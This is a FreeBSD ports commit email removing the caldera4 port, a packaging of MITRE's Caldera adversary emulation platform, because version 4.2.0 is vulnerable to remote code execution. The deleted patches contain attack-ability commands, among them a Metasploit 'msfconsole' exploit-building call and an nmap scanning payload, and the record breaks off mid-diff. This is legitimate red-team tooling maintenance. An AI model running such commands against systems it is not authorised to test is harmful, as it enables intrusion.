From nobody Mon Mar 31 14:40:38 2025 X-Original-To: dev-commits-ports-all@mlmmj.nyi.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2610:1c1:1:606c::19:1]) by mlmmj.nyi.freebsd.org (Postfix) with ESMTP id 4ZRDMB4rccz5s75r; Mon, 31 Mar 2025 14:40:38 +0000 (UTC) (envelope-from git@FreeBSD.org) Received: from mxrelay.nyi.freebsd.org (mxrelay.nyi.freebsd.org [IPv6:2610:1c1:1:606c::19:3]) (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits) key-exchange X25519 server-signature RSA-PSS (4096 bits) server-digest SHA256 client-signature RSA-PSS (4096 bits) client-digest SHA256) (Client CN "mxrelay.nyi.freebsd.org", Issuer "R10" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 4ZRDMB41T0z40mF; Mon, 31 Mar 2025 14:40:38 +0000 (UTC) (envelope-from git@FreeBSD.org) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=freebsd.org; s=dkim; t=1743432038; h=from:from:reply-to:subject:subject:date:date:message-id:message-id: to:to:cc:mime-version:mime-version:content-type:content-type: content-transfer-encoding:content-transfer-encoding; bh=MuNaDi+QQqEsc3fHIa8YGlU3ejGgJ4XzogbCcOJJBuE=; b=oTiZ2WuPBtzLB2zWGhwNFJJ/IVuTAb54TQV7EuXTLfZdH9noSRTUKh83kKNiK30uv9lGgI fKyzed/OSDT1VlrIGB8xME1lHRauYz6Gjy5UTymhV9LKSHEkVG8/I/X8vh5a3Xyk5cnmY1 g/l9WdgXLsxbkoh7ULvbZKRpvOvjkR4y9tTJQ8lrzVtpLeaICy0oZGeNNxGVydevpISaGi UnamnigoR9sdYrtyjBEL2Jy6UEYuj4lkSYuMIbcDrqt8aQiWH17fjZLgwsG6D9AOTbEFY/ i6tlaPEhOhfq8OYWnuJKU2O8KVm4MgBObcQgNFxaeTX78Q9s2U+I5ek3Yvadlw== ARC-Seal: i=1; s=dkim; d=freebsd.org; t=1743432038; a=rsa-sha256; cv=none; b=rkHUh4Y/0BF9V+iw5ulmwGNE5SQwwASKn3YuXFVjG8yoWjRGceLICpzUcBu+wdZuC6lD9T iKt2t4/CkiFK3mAGzaN+qFyv6SsJvA09izC3s62jF11uC5qzOqoFiDUFdCKN03PeOZUiuO /roM4FzOaUGj8VyziGMruR+GDczK0aWkrmqJ+99KYteBAEWWTq2fT6u0wo8I9MTJ+B7PTy pbObesd2emNJEK39Kxs2pnvYV3m+SAjB0tGqEOoRhzWjuNHQ+D5IdeVw9My0sNPBjzm6qV LgnlyrQXGMlx9hDQK8FwNoRXM7zIdSxeUpx0+G+pOmRPI07H8nNNgyJOHWefiQ== ARC-Authentication-Results: i=1; mx1.freebsd.org; none ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=freebsd.org; s=dkim; t=1743432038; h=from:from:reply-to:subject:subject:date:date:message-id:message-id: to:to:cc:mime-version:mime-version:content-type:content-type: content-transfer-encoding:content-transfer-encoding; bh=MuNaDi+QQqEsc3fHIa8YGlU3ejGgJ4XzogbCcOJJBuE=; b=KuKa9k9WDTT8BAgAEwq78tG+1XRY3gZEcWZO71Xf8N8tJJXiBuGFYVj85JMelW5LQsnLBs s6ogVlIp3zBQKlNdD61LNr5yeHach45V2ix/EXZr/vAd8fcpvRdT4bnWSx8F7rCnAZ6z6e YGNc/5t6UCXEHWds/OBIv2PbX3WSjv2p6qYpAhlAmW7mIJiBvut5nFS4kKP2AnxDmuuCtC wESE53L4KoV7otyrzOb0vJwEAC31Rt6Aq+yNolHfsXuMdorYylXIYCV+gkcrtiJljb3RBy LFhBi/vVV8h69fyUI499KXPlFbvWtXKCtM3ET5I6Ot2IAfbh9nIfqrht0uYtEg== Received: from gitrepo.freebsd.org (gitrepo.freebsd.org [IPv6:2610:1c1:1:6068::e6a:5]) (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits) key-exchange X25519 server-signature RSA-PSS (4096 bits) server-digest SHA256) (Client did not present a certificate) by mxrelay.nyi.freebsd.org (Postfix) with ESMTPS id 4ZRDMB3Vcmzq4Q; Mon, 31 Mar 2025 14:40:38 +0000 (UTC) (envelope-from git@FreeBSD.org) Received: from gitrepo.freebsd.org ([127.0.1.44]) by gitrepo.freebsd.org (8.18.1/8.18.1) with ESMTP id 52VEecQp011379; Mon, 31 Mar 2025 14:40:38 GMT (envelope-from git@gitrepo.freebsd.org) Received: (from git@localhost) by gitrepo.freebsd.org (8.18.1/8.18.1/Submit) id 52VEecR8011376; Mon, 31 Mar 2025 14:40:38 GMT (envelope-from git) Date: Mon, 31 Mar 2025 14:40:38 GMT Message-Id: <202503311440.52VEecR8011376@gitrepo.freebsd.org> To: ports-committers@FreeBSD.org, dev-commits-ports-all@FreeBSD.org, dev-commits-ports-main@FreeBSD.org From: Rene Ladan Subject: git: 3b634f895d45 - main - security/caldera4: Remove expired port List-Id: Commit messages for all branches of the ports repository List-Archive: https://lists.freebsd.org/archives/dev-commits-ports-all List-Help: List-Post: List-Subscribe: List-Unsubscribe: X-BeenThere: dev-commits-ports-all@freebsd.org Sender: owner-dev-commits-ports-all@FreeBSD.org MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 8bit X-Git-Committer: rene X-Git-Repository: ports X-Git-Refname: refs/heads/main X-Git-Reftype: branch X-Git-Commit: 3b634f895d45c31481e21bcbe81b89acb346fb95 Auto-Submitted: auto-generated The branch main has been updated by rene: URL: https://cgit.FreeBSD.org/ports/commit/?id=3b634f895d45c31481e21bcbe81b89acb346fb95 commit 3b634f895d45c31481e21bcbe81b89acb346fb95 Author: Rene Ladan AuthorDate: 2025-03-31 14:40:21 +0000 Commit: Rene Ladan CommitDate: 2025-03-31 14:40:21 +0000 security/caldera4: Remove expired port 2025-03-31 security/caldera4: Upgrade to a newer caldera version. 4.2.0 is vulnerable to remote code execution --- MOVED | 1 + security/Makefile | 1 - security/caldera4/Makefile | 108 -- security/caldera4/distinfo | 33 - security/caldera4/files/caldera.in | 85 -- ...lities_bed8f28e-c0ed-463e-9e31-d5607e5473df.yml | 11 - ...hering_567eaaba-94cc-4a27-83f8-768e5638f4e1.yml | 11 - .../patch-plugins_access_data_payloads_scanner.sh | 11 - .../files/patch-plugins_atomic_app_atomic__svc.py | 20 - .../files/patch-plugins_emu_app_emu__svc.py | 11 - .../patch-plugins_gameboard_app_gameboard__api.py | 11 - .../files/patch-plugins_human_templates_human.html | 40 - ...ontrol_356d1722-7784-40c4-822b-0cf864b0b36d.yml | 33 - .../files/patch-plugins_manx_update-shells.sh | 12 - ...ontrol_1837b43e-4fff-46b2-a604-a602f7540469.yml | 15 - ...ection_1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml | 11 - ...ection_3b4640bc-eacb-407a-a997-105e39788781.yml | 18 - ...ection_930236c2-5397-4868-8c7b-72e294a5a376.yml | 18 - ...ection_9bc10f37-0853-4d73-b547-019c11eda22f.yml | 18 - ...ection_ee54384f-cfbc-4228-9dc1-cc5632307afb.yml | 11 - ...unting_4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml | 11 - ...unting_b419604e-6f82-40a4-b215-12f8c8156c2f.yml | 11 - ...unting_bf565e6a-0037-4aa4-852f-1afa222c76db.yml | 11 - ...sponse_02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml | 18 - ...sponse_2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml | 18 - ...sponse_32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml | 18 - ...sponse_bf01fdc9-d801-4461-81df-e511efb3c1fc.yml | 18 - ...sponse_e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml | 18 - ..._setup_243053d2-13c1-47f0-832d-6ef02ba95e1a.yml | 11 - ..._setup_2ed3c315-2022-499e-a844-1bbd119d0abe.yml | 18 - ..._setup_34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml | 18 - ..._setup_622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml | 18 - ..._setup_ba907d7a-b334-47e7-b652-4e481b5aa534.yml | 18 - ..._setup_df9d2b83-b40f-4167-af75-31ddde59af7e.yml | 18 - ..._setup_f313a0d7-2327-4f69-8da4-a6efd6135121.yml | 11 - .../files/patch-plugins_sandcat_app_sand__svc.py | 14 - ...ontrol_2f34977d-9558-4c12-abad-349716777c6b.yml | 45 - .../files/patch-plugins_sandcat_update-agents.sh | 16 - ...gins_stockpile_app_obfuscators_base64__basic.py | 12 - ...ins_stockpile_app_obfuscators_base64__jumble.py | 12 - ...tockpile_app_obfuscators_base64__no__padding.py | 12 - ...ins_stockpile_app_obfuscators_caesar__cipher.py | 12 - ...gins_stockpile_app_obfuscators_steganography.py | 12 - ...ection_02de522f-7e0a-4544-8afc-0c195f400f5f.yml | 11 - ...ection_10fad81e-3f68-47be-83b6-fbee7711c6a9.yml | 11 - ...ection_30a8cf10-73dc-497c-8261-a64cc9e91505.yml | 18 - ...ection_4e97e699-93d7-4040-b5a3-2e906a58199e.yml | 11 - ...ection_6469befa-748a-4b9c-a96d-f191fde47d89.yml | 11 - ...ection_720a3356-eee1-4015-9135-0fc08f7eb2d5.yml | 18 - ...ection_89955f55-529d-4d58-bed4-fed9e42515ec.yml | 11 - ...ection_90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml | 11 - ...ection_b007fe0c-c6b0-4fda-915c-255bbc070de2.yml | 11 - ...ontrol_0ab383be-b819-41bf-91b9-1bd4404d83bf.yml | 15 - ...access_422526ec-27e9-429a-995b-c686a29561a4.yml | 12 - ...access_de632c2d-a729-4b77-b781-6a6b09c148ba.yml | 13 - ...vasion_36eecb80-ede3-442b-8774-956e906aff02.yml | 11 - ...vasion_43b3754c-def4-4699-a673-1d85648fda6a.yml | 15 - ...vasion_4cd4eb44-29a7-4259-91ae-e457b283a880.yml | 17 - ...vasion_5f844ac9-5f24-4196-a70d-17f0bd44a934.yml | 15 - ...covery_30732a56-4a23-4307-9544-09caf2ed29d5.yml | 11 - ...covery_335cea7b-bec0-48c6-adfb-6066070f5f68.yml | 11 - ...covery_3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml | 11 - ...covery_3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml | 11 - ...covery_47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml | 17 - ...covery_52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml | 11 - ...covery_5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml | 12 - ...covery_5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml | 12 - ...covery_5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml | 11 - ...covery_638fb6bb-ba39-4285-93d1-7e4775b033a8.yml | 13 - ...covery_6c91884e-11ec-422f-a6ed-e76774b0daac.yml | 11 - ...covery_6e1a53c0-7352-4899-be35-fa7f364d5722.yml | 11 - ...covery_830bb6ed-9594-4817-b1a1-c298c0f9f425.yml | 10 - ...covery_85341c8c-4ecb-4579-8f53-43e3e91d7617.yml | 18 - ...covery_9849d956-37ea-49f2-a8b5-f2ca080b315d.yml | 11 - ...covery_a41c2324-8c63-4b15-b3c5-84f920d1f226.yml | 11 - ...covery_b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml | 13 - ...covery_b6f545ef-f802-4537-b59d-2cb19831c8ed.yml | 13 - ...covery_bd527b63-9f9e-46e0-9816-b8434d2b8989.yml | 11 - ...covery_c0da588f-79f0-4263-8998-7496b1a40596.yml | 11 - ...covery_c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml | 11 - ...covery_ce485320-41a4-42e8-a510-f5a8fe96a644.yml | 11 - ...covery_e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml | 11 - ...covery_e82f39e2-56f8-4f19-8376-b007f9ac5f8a.yml | 20 - ...covery_fa6e8607-e0b1-425d-8924-9b894da5a002.yml | 11 - ...cution_b1d41972-3ad9-4aa1-8f7f-05f049a2980e.yml | 11 - ...ration_0582dc26-e0cf-4645-88cf-f37a02279976.yml | 11 - ...ration_110cea7a-5b03-4443-92ee-7ccefaead451.yml | 18 - ...ration_2f90d4de-2612-4468-9251-b220e3727452.yml | 11 - ...ration_300157e5-f4ad-4569-b533-9d1fa0e74d74.yml | 18 - ...ration_3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml | 18 - ...ration_4a1120a5-971c-457f-bb07-60641b4723fd.yml | 11 - ...ration_5c5b0392-1daa-45e1-967c-2f361ce78849.yml | 11 - ...ration_a201bec2-a193-4b58-bf0e-57fa621da474.yml | 18 - ...ration_ba0deadb-97ac-4a4c-aa81-21912fc90980.yml | 11 - ...ration_d754878c-17dd-46dc-891c-a993f8a10336.yml | 18 - ...ration_e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml | 18 - ...ration_ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml | 11 - ...impact_46da2385-cf37-49cb-ba4b-a739c7a19de4.yml | 22 - ...impact_47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml | 11 - ...impact_55f9600a-756f-496b-b27f-682052dc429c.yml | 11 - ...vement_10a9d979-e342-418a-a9b0-002c483e0fa6.yml | 16 - ...vement_4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml | 15 - ...lation_10681f2f-be03-44af-858d-f2b0812df185.yml | 12 - .../patch-plugins_stockpile_payloads_ragdoll.py | 11 - ...aining_18702cd3-8e98-4eb7-99d4-0d2816926af1.yml | 11 - ...aining_6d53c4a8-ecd3-4131-a7a2-704a5b43dd83.yml | 17 - ...aining_e13c4e45-d19f-440e-8a72-fad728a1789c.yml | 13 - ...aining_f0d77555-fa79-4884-8afd-73d39f887879.yml | 15 - ...aining_fc4715ac-758e-4ba9-9e52-d07ff3d22a74.yml | 18 - .../caldera4/files/patch-templates_abilities.html | 11 - .../files/patch-templates_adversaries.html | 20 - .../caldera4/files/patch-templates_agents.html | 32 - security/caldera4/files/pkg-message.in | 75 -- security/caldera4/pkg-descr | 14 - security/caldera4/pkg-plist | 1299 -------------------- 115 files changed, 1 insertion(+), 3171 deletions(-) diff --git a/MOVED b/MOVED index ab8f5f0919ae..f4d10e1b0466 100644 --- a/MOVED +++ b/MOVED @@ -4246,3 +4246,4 @@ databases/pgfouine||2025-03-31|Has expired: Upstream project disappeared in 2010 multimedia/spook||2025-03-31|Has expired: Abandonware and obsolete, consider using multimedia/ffmpeg or multimedia/vlc finance/odoo14||2025-03-31|Has expired: Depends on expired converters/wkhtmltopdf and print/py-pypdf2 net/nsscache||2025-03-31|Has expired: Depends on expired devel/py-pytest-runner +security/caldera4||2025-03-31|Has expired: Upgrade to a newer caldera version. 4.2.0 is vulnerable to remote code execution diff --git a/security/Makefile b/security/Makefile index db3fb7bc6e15..4109d398ce11 100644 --- a/security/Makefile +++ b/security/Makefile @@ -68,7 +68,6 @@ SUBDIR += caesarcipher SUBDIR += caldera SUBDIR += caldera-ot - SUBDIR += caldera4 SUBDIR += calife SUBDIR += cardpeek SUBDIR += cargo-audit diff --git a/security/caldera4/Makefile b/security/caldera4/Makefile deleted file mode 100644 index ddbbfa12a4e3..000000000000 --- a/security/caldera4/Makefile +++ /dev/null @@ -1,108 +0,0 @@ -PORTNAME= caldera -DISTVERSION= 4.2.0 -PORTREVISION= 13 -PKGNAMESUFFIX= 4 -CATEGORIES= security python - -MAINTAINER= acm@FreeBSD.org -COMMENT= Automated Adversary Emulation Platform -WWW= https://github.com/mitre/caldera - -CONFLICTS= caldera - -LICENSE= APACHE20 -LICENSE_FILE= ${WRKSRC}/LICENSE - -DEPRECATED= Upgrade to a newer caldera version. 4.2.0 is vulnerable to remote code execution -EXPIRATION_DATE=2025-03-31 - -RUN_DEPENDS= ${PYTHON_PKGNAMEPREFIX}aiohttp>0:www/py-aiohttp@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}aiohttp-jinja2>0:www/py-aiohttp-jinja2@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}aiohttp-session>0:www/py-aiohttp-session@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}aiohttp-security>0:security/py-aiohttp-security@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}aiohttp-apispec>0:devel/py-aiohttp-apispec@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}Jinja2>0:devel/py-Jinja2@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}pyyaml>=0:devel/py-pyyaml@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}websockets>0:devel/py-websockets@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}sphinx>0:textproc/py-sphinx@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}docutils>0:textproc/py-docutils@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}sphinx_rtd_theme>0:textproc/py-sphinx_rtd_theme@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}myst-parser>0:textproc/py-myst-parser@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}marshmallow>0:devel/py-marshmallow@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}dirhash>0:security/py-dirhash@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}docker>0:sysutils/py-docker@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}donut-shellcode>0:devel/py-donut-shellcode@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}marshmallow-enum>0:devel/py-marshmallow-enum@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}ldap3>0:net/py-ldap3@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}lxml>0:devel/py-lxml@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}reportlab>0:print/py-reportlab@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}svglib>0:converters/py-svglib@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}markdown>0:textproc/py-markdown@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}dnspython>0:dns/py-dnspython@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}asyncssh>0:security/py-asyncssh@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}aioftp>0:ftp/py-aioftp@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}pyautogui>0:x11/py-pyautogui@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}selenium>0:www/py-selenium@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}webdriver_manager>0:www/py-webdriver_manager@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}beautifulsoup>0:www/py-beautifulsoup@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}networkx>0:math/py-networkx@${PY_FLAVOR} \ - ${PYTHON_PKGNAMEPREFIX}numpy>0:math/py-numpy@${PY_FLAVOR} \ - upx>0:archivers/upx \ - base64>0:converters/base64 \ - git>0:devel/git \ - bash>0:shells/bash - -USE_GITHUB= yes -GH_ACCOUNT= mitre -GH_PROJECT= ${PORTNAME} -GH_TUPLE= mitre:access:0e67776:access/plugins/access \ - mitre:atomic:9e2c958:atomic/plugins/atomic \ - mitre:builder:f2ce67c:builder/plugins/builder \ - mitre:compass:fb88e02:compass/plugins/compass \ - mitre:debrief:e4d4f9e:debrief/plugins/debrief \ - mitre:emu:02a0f3e:emu/plugins/emu \ - mitre:fieldmanual:c286e77:fieldmanual/plugins/fieldmanual \ - mitre:gameboard:3d98c32:gameboard/plugins/gameboard \ - mitre:human:4368dea:human/plugins/human \ - mitre:manx:e7205ea:manx/plugins/manx \ - mitre:response:889213a:response/plugins/response \ - mitre:sandcat:7c326bd:sandcat/plugins/sandcat \ - mitre:ssl:ac5bfcb:ssl/plugins/ssl \ - mitre:stockpile:960f9ad:stockpile/plugins/stockpile \ - mitre:training:b058b67:training/plugins/training - -USES= dos2unix go:run python -USE_PYTHON= cryptography - -NO_ARCH= yes -NO_BUILD= yes - -DOS2UNIX_REGEX= .*\.([yml]) -CALDERA_USER= caldera -CALDERA_GROUP= caldera -USERS= ${CALDERA_USER} -GROUPS= ${CALDERA_GROUP} - -USE_RC_SUBR= ${PORTNAME:S/-/_/} -SUB_FILES= pkg-message -SUB_LIST= PYTHON_CMD=${PYTHON_CMD} \ - WWWDIR=${WWWDIR} - -OPTIONS_DEFINE= HAPROXY -OPTIONS_DEFAULT=HAPROXY -HAPROXY_DESC= Support for HTTPS -HAPROXY_RUN_DEPENDS=haproxy24>0:net/haproxy24 - -post-extract: - ${RM} -R ${WRKSRC}/.github - cd ${WRKSRC} && ${RM} .coveragerc .dockerignore .eslintrc.js .flake8 \ - .git* .pre* .stylelintrc.json Dockerfile - -post-patch: - cd ${WRKSRC} && \ - ${FIND} . -type f -name "*.orig" -exec ${RM} "{}" \; - -do-install: - @cd ${WRKSRC} && ${COPYTREE_SHARE} . ${STAGEDIR}/${WWWDIR} - -.include diff --git a/security/caldera4/distinfo b/security/caldera4/distinfo deleted file mode 100644 index 7542fc288b4e..000000000000 --- a/security/caldera4/distinfo +++ /dev/null @@ -1,33 +0,0 @@ -TIMESTAMP = 1687320760 -SHA256 (mitre-caldera-4.2.0_GH0.tar.gz) = 2c93501ca05fe89cd18a038376c278e50d371881dfe84824a0f98dc3d9023fd9 -SIZE (mitre-caldera-4.2.0_GH0.tar.gz) = 3777586 -SHA256 (mitre-access-0e67776_GH0.tar.gz) = dc80b9c5cb92f75fa6d18f618f64a4d3c5ddd1b08b020d86feb70fbaa0f4c43d -SIZE (mitre-access-0e67776_GH0.tar.gz) = 8494 -SHA256 (mitre-atomic-9e2c958_GH0.tar.gz) = 0fbd0c3bb2c3c621afcb8f271b76df0f6ac2bacd72a7f8d9771c94b9a3f5d085 -SIZE (mitre-atomic-9e2c958_GH0.tar.gz) = 15142 -SHA256 (mitre-builder-f2ce67c_GH0.tar.gz) = da9d987a2a656bb9eb5d1c0d36115c8fb8fe740503fa1a43a1bfcce1018f461b -SIZE (mitre-builder-f2ce67c_GH0.tar.gz) = 7944 -SHA256 (mitre-compass-fb88e02_GH0.tar.gz) = 6187446551f4041ac0a0c33689b4a62a39a02b285d988bd6f17647d89d98ce16 -SIZE (mitre-compass-fb88e02_GH0.tar.gz) = 5907 -SHA256 (mitre-debrief-e4d4f9e_GH0.tar.gz) = 721b262744118b91b812ec0e098fa0c75f845a7814d8fa58fa52a2ace04432ee -SIZE (mitre-debrief-e4d4f9e_GH0.tar.gz) = 998929 -SHA256 (mitre-emu-02a0f3e_GH0.tar.gz) = 9dd6b46fe93ba12467612e4bf4a45df5513dad1709a72addc3898c430b8ec1ad -SIZE (mitre-emu-02a0f3e_GH0.tar.gz) = 17467 -SHA256 (mitre-fieldmanual-c286e77_GH0.tar.gz) = 6f086d0d4f519d0dcf49fbded87ee8095622c3028461d745d2e7eea422d68d57 -SIZE (mitre-fieldmanual-c286e77_GH0.tar.gz) = 7828491 -SHA256 (mitre-gameboard-3d98c32_GH0.tar.gz) = 8415bbbc64fe78836afea2e364fe655cc364a5d70dcf3fbcb748617fc9b9ad0a -SIZE (mitre-gameboard-3d98c32_GH0.tar.gz) = 14753 -SHA256 (mitre-human-4368dea_GH0.tar.gz) = 4710f3d6c7b3f728274187c36cda53232b3609d8177ccad6b1968ae99d83724a -SIZE (mitre-human-4368dea_GH0.tar.gz) = 22846 -SHA256 (mitre-manx-e7205ea_GH0.tar.gz) = 5b39a00ff8bbe7b20d4cfcab6161edbbafd94fa9bd62af4741975f7759f7a470 -SIZE (mitre-manx-e7205ea_GH0.tar.gz) = 7352820 -SHA256 (mitre-response-889213a_GH0.tar.gz) = 4067efd0c4bddeed799255838a80316d96ba0c4cac84625d7d0257e44c00c4ee -SIZE (mitre-response-889213a_GH0.tar.gz) = 24463 -SHA256 (mitre-sandcat-7c326bd_GH0.tar.gz) = 60049cf759e8b31b29e84832a112c87be8101e303d088e0f2b9da4647f79855f -SIZE (mitre-sandcat-7c326bd_GH0.tar.gz) = 7816391 -SHA256 (mitre-ssl-ac5bfcb_GH0.tar.gz) = 01067db5fe9a32d07d13bbea4ffb6f3bd2907a57f2d50a7c7e9c5f2bdc823a12 -SIZE (mitre-ssl-ac5bfcb_GH0.tar.gz) = 6395 -SHA256 (mitre-stockpile-960f9ad_GH0.tar.gz) = 516d28ae26d66049e2273f60bbae0254b071152b613f259a7ff596ad2d92461f -SIZE (mitre-stockpile-960f9ad_GH0.tar.gz) = 4781396 -SHA256 (mitre-training-b058b67_GH0.tar.gz) = 44c5ee5f682918f1f8ace4ff4ea3b8e16d24795ff8b8fb5896d68c585d33b8c0 -SIZE (mitre-training-b058b67_GH0.tar.gz) = 491615 diff --git a/security/caldera4/files/caldera.in b/security/caldera4/files/caldera.in deleted file mode 100644 index d08e4fae7d5c..000000000000 --- a/security/caldera4/files/caldera.in +++ /dev/null @@ -1,85 +0,0 @@ -#!/bin/sh - -# PROVIDE: caldera -# REQUIRE: NETWORKING -# KEYWORD: shutdown -# -# Configuration settings for caldera in /etc/rc.conf: -# -# caldera_enable: run caldera as service (default=NO) -# caldera_flags: additional flags for caldera server -# - -. /etc/rc.subr - -name=caldera -rcvar=caldera_enable - -load_rc_config ${name} - -export PATH="${PATH}:/usr/local/bin:/usr/local/sbin" - -: ${caldera_enable:=NO} -: ${caldera_flags="--insecure"} - -caldera_env="GOCACHE=/tmp/caldera/.cache GOMODCACHE=/tmp/caldera/.vendor" -caldera_user="caldera" -caldera_wwwdir="%%WWWDIR%%" -caldera_logfile="/var/log/caldera.log" - -pidfile="/var/run/${name}.pid" -python_command="%%PYTHON_CMD%%" -python_script="${caldera_wwwdir}/server.py" -start_cmd=${name}_start -status_cmd=${name}_status -stop_cmd=${name}_stop -restart_cmd=${name}_restart -extra_commands="status" - -caldera_start() -{ - if [ ! -f ${pidfile} ] - then - cd ${caldera_wwwdir} && \ - daemon -u ${caldera_user} -p ${pidfile} -t ${name} -o ${caldera_logfile} \ - ${python_command} ${python_script} \ - ${caldera_flags} - - echo "Starting ${name}" - else - echo "${name} is running as pid" `cat ${pidfile}` - fi -} - -caldera_status() -{ - # If running, show pid - if [ -f ${pidfile} ] - then - echo "${name} is running as pid" `cat ${pidfile}` - else - echo "${name} is not running" - fi -} - -caldera_stop() -{ - if [ -f ${pidfile} ] - then - kill `cat ${pidfile}` - rm ${pidfile} - echo "Stopping ${name}" - else - echo "${name} not running? (check ${pidfile})." - fi -} - -caldera_restart() -{ - echo "Performing restart ${name}" - caldera_stop - sleep 3 - caldera_start -} - -run_rc_command "$1" diff --git a/security/caldera4/files/patch-plugins_access_data_abilities_build-capabilities_bed8f28e-c0ed-463e-9e31-d5607e5473df.yml b/security/caldera4/files/patch-plugins_access_data_abilities_build-capabilities_bed8f28e-c0ed-463e-9e31-d5607e5473df.yml deleted file mode 100644 index c0bc8a3c91ed..000000000000 --- a/security/caldera4/files/patch-plugins_access_data_abilities_build-capabilities_bed8f28e-c0ed-463e-9e31-d5607e5473df.yml +++ /dev/null @@ -1,11 +0,0 @@ ---- plugins/access/data/abilities/build-capabilities/bed8f28e-c0ed-463e-9e31-d5607e5473df.yml.orig 2021-10-01 14:07:40 UTC -+++ plugins/access/data/abilities/build-capabilities/bed8f28e-c0ed-463e-9e31-d5607e5473df.yml -@@ -7,7 +7,7 @@ - name: Build or acquire exploits - attack_id: T1349 - platforms: -- darwin,linux: -+ darwin,freebsd,linux: - sh: - command: | - msfconsole -r msf_extract.rc #{app.contact.http} #{app.api_key.red} diff --git a/security/caldera4/files/patch-plugins_access_data_abilities_technical-information-gathering_567eaaba-94cc-4a27-83f8-768e5638f4e1.yml b/security/caldera4/files/patch-plugins_access_data_abilities_technical-information-gathering_567eaaba-94cc-4a27-83f8-768e5638f4e1.yml deleted file mode 100644 index f7304f2ee2ad..000000000000 --- a/security/caldera4/files/patch-plugins_access_data_abilities_technical-information-gathering_567eaaba-94cc-4a27-83f8-768e5638f4e1.yml +++ /dev/null @@ -1,11 +0,0 @@ ---- plugins/access/data/abilities/technical-information-gathering/567eaaba-94cc-4a27-83f8-768e5638f4e1.yml.orig 2021-10-01 14:07:40 UTC -+++ plugins/access/data/abilities/technical-information-gathering/567eaaba-94cc-4a27-83f8-768e5638f4e1.yml -@@ -7,7 +7,7 @@ - name: Conduct active scanning - attack_id: T1254 - platforms: -- darwin,linux: -+ darwin,freebsd,linux: - sh: - command: | - ./scanner.sh #{target.ip} diff --git a/security/caldera4/files/patch-plugins_access_data_payloads_scanner.sh b/security/caldera4/files/patch-plugins_access_data_payloads_scanner.sh deleted file mode 100644 index acdadfff6d43..000000000000 --- a/security/caldera4/files/patch-plugins_access_data_payloads_scanner.sh +++ /dev/null @@ -1,11 +0,0 @@ ---- plugins/access/data/payloads/scanner.sh.orig 2021-10-01 14:07:40 UTC -+++ plugins/access/data/payloads/scanner.sh -@@ -1,5 +1,5 @@ --#!/bin/bash -+#!/bin/sh - - echo '[+] Starting basic NMAP scan' - nmap -Pn $1 --echo '[+] Complete with module' -\ No newline at end of file -+echo '[+] Complete with module' diff --git a/security/caldera4/files/patch-plugins_atomic_app_atomic__svc.py b/security/caldera4/files/patch-plugins_atomic_app_atomic__svc.py deleted file mode 100644 index 04e18806665b..000000000000 --- a/security/caldera4/files/patch-plugins_atomic_app_atomic__svc.py +++ /dev/null @@ -1,20 +0,0 @@ ---- plugins/atomic/app/atomic_svc.py.orig 2022-08-11 15:59:49 UTC -+++ plugins/atomic/app/atomic_svc.py 